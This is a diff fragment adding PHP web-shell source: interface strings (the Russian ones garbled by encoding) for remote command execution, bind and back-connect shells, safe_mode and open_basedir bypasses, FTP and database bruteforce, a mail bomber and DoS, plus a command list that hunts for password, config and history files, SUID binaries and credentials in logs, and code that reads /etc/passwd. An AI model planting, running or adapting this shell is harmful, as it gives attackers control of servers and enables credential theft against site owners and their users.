+'ru_text25'=>'??àë???ûé ïî??',
+'ru_text26'=>'E?ïîëüçîâà?ü',
+'ru_butt5' =>'Càï???è?ü',
+'ru_text28'=>'?à?î?à â safe_mode',
+'ru_text29'=>'?î???ï çàï??ù??',
+'ru_butt6' =>'????è?ü',
+'ru_text30'=>'I?î??î?? ôàéëà',
+'ru_butt7' =>'Aûâ???è',
+'ru_text31'=>'Oàéë ?? ?àé???',
+'ru_text32'=>'Aûïîë???è? PHP êî?à',
+'ru_text33'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir ÷???ç ô??ê?èè cURL (PHP <= 4.4.2, 5.1.4)',
+'ru_butt8' =>'I?îâ??è?ü',
+'ru_text34'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode ÷???ç ô??ê?è? include',
+'ru_text35'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode ÷???ç çà???çê? ôàéëà â mysql',
+'ru_text36'=>'?àçà . ?à?ëè?à',
+'ru_text37'=>'Eî?è?',
+'ru_text38'=>'Ià?îëü',
+'ru_text39'=>'?àçà',
+'ru_text40'=>'?à?ï ?à?ëè?û ?àçû ?à??û?',
+'ru_butt9' =>'?à?ï',
+'ru_text41'=>'?î??à?è?ü â ôàéë?',
+'ru_text42'=>'???àê?è?îâà?è? ôàéëà',
+'ru_text43'=>'???àê?è?îâà?ü ôàéë',
+'ru_butt10'=>'?î??à?è?ü',
+'ru_butt11'=>'???àê?è?îâà?ü',
+'ru_text44'=>'???àê?è?îâà?è? ôàéëà ??âîç?î??î! ?î???ï ?îëüêî ?ë? ÷???è?!',
+'ru_text45'=>'Oàéë ?î??à???',
+'ru_text46'=>'I?î??î?? phpinfo()',
+'ru_text47'=>'I?î??î?? ?à???î?ê php.ini',
+'ru_text48'=>'??àë??è? â??????û? ôàéëîâ',
+'ru_text49'=>'??àë??è? ?ê?èï?à ? ???â??à',
+'ru_text50'=>'E?ôî??à?è? î ï?î????î??',
+'ru_text51'=>'E?ôî??à?è? î ïà???è',
+'ru_text52'=>'??ê?? ?ë? ïîè?êà',
+'ru_text53'=>'E?êà?ü â ïàïê?',
+'ru_text54'=>'Iîè?ê ??ê??à â ôàéëà?',
+'ru_butt12'=>'?àé?è',
+'ru_text55'=>'?îëüêî â ôàéëà?',
+'ru_text56'=>'?è÷??î ?? ?àé???î',
+'ru_text57'=>'?îç?à?ü/??àëè?ü Oàéë/?è??ê?î?è?',
+'ru_text58'=>'E??',
+'ru_text59'=>'Oàéë',
+'ru_text60'=>'?è??ê?î?è?',
+'ru_butt13'=>'?îç?à?ü/??àëè?ü',
+'ru_text61'=>'Oàéë ?îç?à?',
+'ru_text62'=>'?è??ê?î?è? ?îç?à?à',
+'ru_text63'=>'Oàéë ??àë??',
+'ru_text64'=>'?è??ê?î?è? ??àë??à',
+'ru_text65'=>'?îç?à?ü',
+'ru_text66'=>'??àëè?ü',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'Eî?à??à',
+'ru_text69'=>'Ià?à????1',
+'ru_text70'=>'Ià?à????2',
+'ru_text71'=>"A?î?îé ïà?à???? êî?à??û:\r\n- ?ë? CHOWN - è?? ?îâî?î ïîëüçîâà??ë? èëè ??î UID (÷è?ëî?) \r\n- ?ë? êî?à??û CHGRP - è?? ???ïïû èëè GID (÷è?ëî?) \r\n- ?ë? êî?à??û CHMOD - ??ëî? ÷è?ëî â âî?ü???è÷?î? ï?????àâë??èè (?àï?è??? 0777)",
+'ru_text72'=>'??ê?? ?ë? ïîè?êà',
+'ru_text73'=>'E?êà?ü â ïàïê?',
+'ru_text74'=>'E?êà?ü â ôàéëà?',
+'ru_text75'=>'* ?î??î è?ïîëüçîâà?ü ????ë???î? âû?à???è?',
+'ru_text76'=>'Iîè?ê ??ê??à â ôàéëà? ? ïî?îùü? ??èëè?û find',
+'ru_text80'=>'?èï',
+'ru_text81'=>'???ü',
+'ru_text82'=>'?àçû ?à??û?',
+'ru_text83'=>'Aûïîë???è? SQL çàï?î?à',
+'ru_text84'=>'SQL çàï?î?',
+'ru_text85'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode ÷???ç âûïîë???è? êî?à?? â MSSQL ???â???',
+'ru_text86'=>'?êà÷èâà?è? ôàéëà ? ???â??à',
+'ru_butt14'=>'?êà÷à?ü',
+'ru_text87'=>'?êà÷èâà?è? ôàéëîâ ? ??àë???î?î ftp-???â??à',
+'ru_text88'=>'???â??:ïî??',
+'ru_text89'=>'Oàéë ?à ftp ???â???',
+'ru_text90'=>'???è? ï????à÷è',
+'ru_text91'=>'A??èâè?îâà?ü â',
+'ru_text92'=>'??ç à??èâ.',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????ôî??',
+'ru_text95'=>'?ïè?îê ïîëüçîâà??ë?é',
+'ru_text96'=>'?? ??àëî?ü ïîë?÷è?ü ?ïè?îê ïîëüçîâà??ë?é',
+'ru_text97'=>'I?îâ????î êî??è?à?èé: ',
+'ru_text98'=>'??à÷?û? ïî?êë?÷??èé: ',
+'ru_text99'=>'/etc/passwd',
+'ru_text100'=>'I?ï?àâêà ôàéëîâ ?à ??àë???ûé ô?ï ???â??',
+'ru_text101'=>'ï???â?????î? (user -> resu)',
+'ru_text102'=>'Iî÷?à',
+'ru_text103'=>'I?ï?àâêà ïè?ü?à',
+'ru_text104'=>'I?ï?àâêà ôàéëà ?à ïî÷?îâûé ?ùèê',
+'ru_text105'=>'Eî??',
+'ru_text106'=>'I?',
+'ru_text107'=>'???à',
+'ru_butt15'=>'I?ï?àâè?ü',
+'ru_text108'=>'??ê?? ïè?ü?à',
+'ru_text109'=>'?â?????ü',
+'ru_text110'=>'?àçâ?????ü',
+'ru_text111'=>'SQL-???â?? : ïî??',
+'ru_text112'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode ÷???ç è?ïîëüçîâà?è? ô??ê?èè mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
+'ru_text113'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode, ï?î??î?? ëè??è??à ?è??ê?î?èé ? è?ïîëüçîâà?è?? imap_list (PHP <= 5.1.2)',
+'ru_text114'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode, ï?î??î?? ?î????è?î?î ôàéëà ? è?ïîëüçîâà?è?? imap_body (PHP <= 5.1.2)',
+'ru_text115'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode, êîïè?îâà?è? ôàéëîâ ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
+'ru_text116'=>'Eîïè?îâà?ü ôàéë',
+'ru_text117'=>'â',
+'ru_text118'=>'Oàéë ?êîïè?îâà?',
+'ru_text119'=>'?? ??àëî?ü ?êîïè?îâà?ü ôàéë',
+'ru_text120'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé safe_mode, ï?î??î?? ?î????è?î?î ôàéëà ? è?ïîëüçîâà?è?? ini_restore (PHP <= 4.4.4, 5.1.6) By KingDefacer',
+'ru_text121'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ï?î??î?? ëè??è??à ?è??ê?î?èé ? è?ïîëüçîâà?è?? fopen (PHP v4.4.0 memory leak) By KingDefacer',
+'ru_text122'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ï?î??î?? ëè??è??à ?è??ê?î?èé ? è?ïîëüçîâà?è?? glob (PHP <= 5.2.x)',
+'ru_text123'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ÷???è? *.bzip à??èâà [compress.bzip2://] (PHP <= 5.2.1)',
+'ru_text124'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ?îçàïè?ü ôàéëîâ ? error_log[php://] (PHP <= 5.1.4, 4.4.2)',
+'ru_text125'=>'?à??û?',
+'ru_text126'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ?îç?à?è? ôàéëà ????èè ? ?à??û?è[NULL-byte] (PHP <= 5.2.0)',
+'ru_text127'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ?îçàïè?ü ôàéëîâ ? readfile[php://] (PHP <= 5.2.1, 4.4.4)',
+'ru_text128'=>'?à?à èç?????è?\?î???ïà(touch)',
+'ru_text129'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ?îç?à?è? ôàéëà ? fopen[srpath://] (PHP v5.2.0)',
+'ru_text130'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ÷???è? *.zip à??èâà [zip://] (PHP <= 5.2.1)',
+'ru_text131'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ï?î??î?? ?î????è?î?î ôàéëà ? è?ïîëüçîâà?è?? symlink() (PHP <= 5.2.1)',
+'ru_text132'=>'I?îâ??êà âîç?î??î??è î??î?à î??à?è÷??èé open_basedir, ï?î??î?? ëè??è??à ?è??ê?î?èé ? è?ïîëüçîâà?è?? symlink() (PHP <= 5.2.1)',
+'ru_text133'=>'',
+'ru_text134'=>'????ôî?? ?àç ?à??û?',
+'ru_text135'=>'?ëîâà?ü',
+'ru_text136'=>'?îç?à?è? ?è?âîëü?îé ??ûëêè',
+'ru_text137'=>'Iîë?ç?î?',
+'ru_text138'=>'Iïà??î?',
+'ru_text139'=>'?àèë-?î????',
+'ru_text140'=>'DoS',
+'ru_text141'=>'I??î?î??î! Aîç?î??? ê?à? A??-???âè?à.',
+'ru_err0'=>'I?è?êà! ?? ?î?? çàïè?à?ü â ôàéë ',
+'ru_err1'=>'I?è?êà! ?? ?î?? ï?î÷è?à?ü ôàéë ',
+'ru_err2'=>'I?è?êà! ?? ??àëî?ü ?îç?à?ü ',
+'ru_err3'=>'I?è?êà! ?? ??àëî?ü ïî?êë?÷è?ü?? ê ftp ???â???',
+'ru_err4'=>'I?è?êà àâ?î?èçà?èè ?à ftp ???â???',
+'ru_err5'=>'I?è?êà! ?? ??àëî?ü ïî?????ü ?è??ê?î?è? ?à ftp ???â???',
+'ru_err6'=>'I?è?êà! ?? ??àëî?ü î?ï?àâè?ü ïè?ü?î',
+'ru_err7'=>'Iè?ü?î î?ï?àâë??î',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without arch.',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'/etc/passwd',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu)',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail (PHP <= 4.0-4.2.2, 5.x)',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list (PHP <= 5.1.2)',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body (PHP <= 5.1.2)',
+'eng_text115'=>'Test bypass safe_mode, copy file via copy[compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) By KingDefacer',
+'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) By KingDefacer',
+'eng_text122'=>'Test bypass open_basedir, view dir list via glob (PHP <= 5.2.x)',
+'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
+'eng_text124'=>'Test bypass open_basedir, add data to file via error_log[php://] (PHP <= 5.1.4, 4.4.2)',
+'eng_text125'=>'Data',
+'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
+'eng_text127'=>'Test bypass open_basedir, add data to file via readfile[php://] (PHP <= 5.2.1, 4.4.4)',
+'eng_text128'=>'Modify/Access date(touch)',
+'eng_text129'=>'Test bypass open_basedir, create file via fopen[srpath://] (PHP v5.2.0)',
+'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
+'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
+'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
+'eng_text133'=>'',
+'eng_text134'=>'Database-bruteforce',
+'eng_text135'=>'Dictionary',
+'eng_text136'=>'Creating evil symlink',
+'eng_text137'=>'Useful',
+'eng_text138'=>'Dangerous',
+'eng_text139'=>'Mail Bomber',
+'eng_text140'=>'DoS',
+'eng_text141'=>'Danger! Web-daemon crash possible.',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+);
+/*
+Aëèà?û êî?à??
+Iîçâîë??? èç???à?ü ??î?îê?à??î?î ?à?î?à î??è? è ???-?? êî?à??. ( ???ëà?î ?ëà?î?à?? ?î?é ï?è?î??îé ë??è )
+Aû ?î???? ?à?è ?î?àâë??ü èëè èç?????ü êî?à??û.
+*/
+$aliases=array(
+'----------------------------------locate'=>'',
+'locate httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate psybnc.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate my.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate my.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".htpasswd" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".bash_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".mysql_history" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate backup files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate backup >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate dump files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate dump >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate priv files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate priv >> /tmp/grep.txt;cat /tmp/grep.txt',
+'----------------------------------tar'=>'',
+'tar -czvf all.tgz -T /tmp/grep.txt'=>'tar -czvf all.tgz -T /tmp/grep.txt',
+'----------------------------------1'=>'',
+'locate access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'locate ".log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'locate ".log" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'----------------------------------2'=>'',
+'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt;cat /tmp/grep.txt'=>'cat /var/log/httpd/access_log | grep pass >> /tmp/grep.txt',
+'----------------------------------find'=>'',
+'find suid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find suid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -04000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find sgid files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find sgid files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -02000 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type f -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable directories >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /  -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable directories in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -type d -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable directories and files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all writable directories and files in current dir >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find . -perm -2 -ls  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all .htpasswd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .htpasswd  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all .bash_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .bash_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all .mysql_history files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .mysql_history  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find all .fetchmailrc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name .fetchmailrc  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find httpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name httpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find vhosts.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name vhosts.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find proftpd.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name proftpd.conf >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find admin.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name admin.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "config*"  >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find cfg.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name cfg.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find conf.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name conf.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config.dat files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.dat >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config.inc files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config.inc.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.inc.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find config.default.php files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name config.default.php >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find *.conf files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.conf" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find *.pwd files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.pwd" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find *.sql files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*.sql" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find *backup* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*backup*" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find *dump* files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find / -type f -name "*dump*" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'-----------------------------------'=>'',
+'find /var/ access_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access_log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error_log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error_log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ access.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name access.log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ error.log files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name error.log >> /tmp/grep.txt;cat /tmp/grep.txt',
+'find /var/ "*.log" files >> /tmp/grep.txt;cat /tmp/grep.txt'=>'find /var/ -type f -name "*.log" >> /tmp/grep.txt;cat /tmp/grep.txt',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
+if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = @php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
